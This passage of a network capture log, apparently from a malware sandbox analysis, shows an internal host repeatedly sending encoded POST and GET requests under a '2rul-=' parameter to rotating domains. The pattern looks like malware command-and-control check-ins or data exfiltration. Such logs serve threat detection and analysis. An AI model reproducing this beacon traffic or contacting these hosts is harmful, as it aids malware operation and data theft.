User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:57:51.034414053 CEST | 548 | IN | HTTP/1.1 404 Not Found
Date: Wed, 23 Oct 2024 16:57:50 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.20 | 49862 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:56.157155037 CEST | 811 | OUT | POST /2x6z/ HTTP/1.1
Host: www.refs4refs.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.refs4refs.info
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 202
Referer: http://www.refs4refs.info/2x6z/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5oGfUtiZ0uu7GZOeWqArkwm1nPdYSJhNuTqVgktFB5pNgVZZya2fKjWv//YBCsaSeDK8llg+l8/8QfY4myu96KhaXxe3YUy88RpYrgNO331kazwJHPlI6YAOjpq7kWofvE3wfSsYfPEpHdUvTeAyYDhEZxRhfEqN4FhjrW0aN3Zx5B3FwfYruUw==


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.20 | 49863 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:58.800868034 CEST | 831 | OUT | POST /2x6z/ HTTP/1.1
Host: www.refs4refs.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.refs4refs.info
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 222
Referer: http://www.refs4refs.info/2x6z/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5pmvUrBh0nu7BWueWzQr/wm5nPcNfJzZuTLFgicFB8pNgNpZNHGf7jXTZ/YtCsaWeDPAllR+i9v8ST4448O96KhaXxeSDUy08R5orioy0plkZjgJHZlJ9YAOBprnOWuTvE1ofS5kYVUpFX0udQVSUbz00wSVfL6RwJXuxLGup0KtLFH8Ydaq1J6uLmpHloROtjdBqYFOLuEY=


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.11.20 | 49864 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:58:01.439574003 CEST | 2578 | OUT | POST /2x6z/ HTTP/1.1
Host: www.refs4refs.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.refs4refs.info
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 7370
Referer: http://www.refs4refs.info/2x6z/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:58:01.439630032 CEST | 5402 | OUT


Session ID  Source IP  Source Port  Destination IP  Destination Port
73  192.168.11.20  49865  3.33.130.190  80
Timestamp  Bytes transferred  Direction  Data
Oct 23, 2024 18:58:05.089692116 CEST  536  OUT  GET /2x6z/?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:58:05.192934036 CEST  390  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:05 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO"}</script></head></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port
74  192.168.11.20  49866  162.241.63.77  80
Timestamp  Bytes transferred  Direction  Data
Oct 23, 2024 18:58:10.325833082 CEST  817  OUT  POST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1Skkl9ZqIzk5UIYKIShZuzzeRoydUgS1SKEx+FRkRpwgP9FCXruhINGF2kOfeuDs8ocRd+GQVuAQZKju/RcIXeATnIh9dRn4JQGa2uuwY0mDkRBpjDj+fr7ITxEDF5oGePeARwWDu2MS08Xw7s9kZqXAXZVsuBm6l/oR6wDewMmSnHjejkCwtYZ9w==
Oct 23, 2024 18:58:10.525369883 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:10 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
Oct 23, 2024 18:58:10.525419950 CEST  277  IN


Session ID  Source IP  Source Port  Destination IP  Destination Port
75  192.168.11.20  49867  162.241.63.77  80
Timestamp  Bytes transferred  Direction  Data
Oct 23, 2024 18:58:12.981201887 CEST  837  OUT  POST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1SkmENZorrkuEIbAoShXOz3eRkydVU81hiExaJRjQpwhP9FanqkuoNdF2pzfauDs88cRf2GXmGDfpKb1vRSG3eATnIh9cxB4JIGGXeu/Z0lOERehDDjsvr3ITw+DG9OGYLeAQAWA8ePY08R07thl4PBAUtZl5k/93jSUs9ZDC4CR0bRaTdqyvZCg7CRQqnIZxexqXd1OHG2QfA=
Oct 23, 2024 18:58:13.195924997 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:13 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
Oct 23, 2024 18:58:13.196001053 CEST  277  IN


Session ID  Source IP  Source Port  Destination IP  Destination Port
76  192.168.11.20  49868  162.241.63.77  80
Timestamp  Bytes transferred  Direction  Data
Oct 23, 2024 18:58:15.637100935 CEST  1289  OUT  POST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:58:15.813774109 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:15 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


Session ID  Source IP  Source Port  Destination IP  Destination Port
77  192.168.11.20  49869  162.241.63.77  80
Timestamp  Bytes transferred  Direction  Data
Oct 23, 2024 18:58:18.290411949 CEST  538  OUT  GET /65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g= HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:58:18.553623915 CEST  571  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:18 GMT
                                                                                                                                                                                                                        Server: nginx/1.23.4
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                                                                                        Location: http://estrela-b.online/65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g=
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        X-Server-Cache: true
                                                                                                                                                                                                                        X-Proxy-Cache: MISS


Session ID  Source IP  Source Port  Destination IP  Destination Port
78  192.168.11.20  49870  185.134.245.113  80
Timestamp  Bytes transferred  Direction  Data
Oct 23, 2024 18:58:28.777250051 CEST  823  OUT  POST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUC0GTlqeAgXdINbxJgr5x7hxymuoJpoce2+4QceZpPCOQLxmOo+GiIK/uW6mxNeBxWPHnAg74iNk2TR8fvvEbDll1PRY/14QVD+JmUY+NqI7YaJ8IAhyp9VqwssvsSiBbUwrzFkDYCbathMXbypdHryVqapUoXOwpYxR5Y4kEF3VZs0NlDMQktg==
Oct 23, 2024 18:58:28.972397089 CEST  716  IN  HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:28 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID  Source IP  Source Port  Destination IP  Destination Port
79  192.168.11.20  49871  185.134.245.113  80
Timestamp  Bytes transferred  Direction  Data
Oct 23, 2024 18:58:31.511482000 CEST  843  OUT  POST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUCRWT25GAn3dLUrxJu7517h9ymvsjp6oe4/IQffZpMCOQTBmB1OGpIKiRW7axNeFxWKjnAXn5wNkwVR8BrvEbDll1PRNq14oVDO5mV9SOjo7bZJ8IXRy19VqSsvrKSg5bUxbzAm7XR7avlMWYkqo2yjteK5MhetIGUHcjFKQgGkJroE0NBOR/wieFCPiA2B0h1UgoNxFsWco=
Oct 23, 2024 18:58:31.708153009 CEST  716  IN  HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:31 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.11.20 | 49872 | 185.134.245.113 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:58:34.246052980 CEST | 1289 | OUT | POST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Data Ascii: 2rul-=[TRUNCATED]
Oct 23, 2024 18:58:34.246110916 CEST | 6703 | OUT
                                                                                                                                                                                                                        Data Ascii: RbzFjLcqlEhd0Ej00JZA9oxAlDrH5L8BTuhsRdgkFQuKweG3vGw87vLqcFioRzQK7s0NrW5D5Nrrhjn43j7UfReoSYHLbEwdmfufRoIs6OZLSIR4BLTA+k7Az21/jW/TKuLfMhu1Fd+0PeRRq3oTb/2N1iCLBv/mdQ65KYSLOoH3RV+16nyvWULZIgkDMHvTrF6GBtpIvznKg7ZAcq1wFgvgdmAKOxcLF5Q9yaiPUPYlHDUG6Bp
Oct 23, 2024 18:58:34.443314075 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:34 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.11.20 | 49873 | 185.134.245.113 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:58:36.972995043 CEST | 540 | OUT | GET /13t3/?2rul-=OPGGyibZykz1HQ+fwNDr+1YpMJUD6qxq+hpAjJgj1ZR94MAkLt42BGXqMjTev/m9FIbjW4eTPcRZap/xAhCWotsEASV9n/5Kf2dVcxkz55MgVuVRQ72L8tA=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:58:37.166337967 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:37 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Expires: Wed, 23 Oct 2024 17:58:37 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                                        Data Ascii: 154a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.russe-trykk.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
Oct 23, 2024 18:58:37.166614056 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { positi
Oct 23, 2024 18:58:37.166738987 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: ref="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.russe-trykk.online') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vre aktivt brukt
Oct 23, 2024 18:58:37.166883945 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: <div class="container"> <h1 id="t"> www.russe-trykk.online is parked </h1> <p id="m"> www.russe-trykk.online is registered, but the owner currently does not have an active website
Oct 23, 2024 18:58:37.166932106 CEST | 565 | IN
                                                                                                                                                                                                                        Data Ascii: >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 71741cd14833bbbeea44538997e1c15c/parkedweb01 </span> </div> <script> q("ls").setAttribute("style", ""); fun


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.11.20 | 49874 | 172.67.148.133 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:58:42.281696081 CEST | 808 | OUT | POST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8uX+MhbjDYJwUYLPabXZUCipJAhc8/GWH8cdjlYF8r3IDvIlJkugExU65/HNcD4vfeIj8Ou/FCg+eR7/nVd1L8pvyUH7MrIyu4ATNVu7OsA74Mf947o0y4DuArwcpNnoEgbzysA1QxPOtGdxqecgnr7Mwi5ZtFWjw/Kc7P9a+x3y+7NbyMOp0Fg==
Oct 23, 2024 18:58:42.608000994 CEST | 1289 | IN | HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:42 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KN79VzwUtdqvSKpySWdS%2F%2B8FSANgptTCmh%2FfnAPyMVKDh%2FdtAcR6gRjYaFjR2d4ow2xPR2J%2Fxz%2B%2Ba%2BPhLVKpjQLuujC9Ro85%2BRacx7RnP6jg30SSIP0%2F9s2iaPtjlnzTuicrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7345fe9f790cb1-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
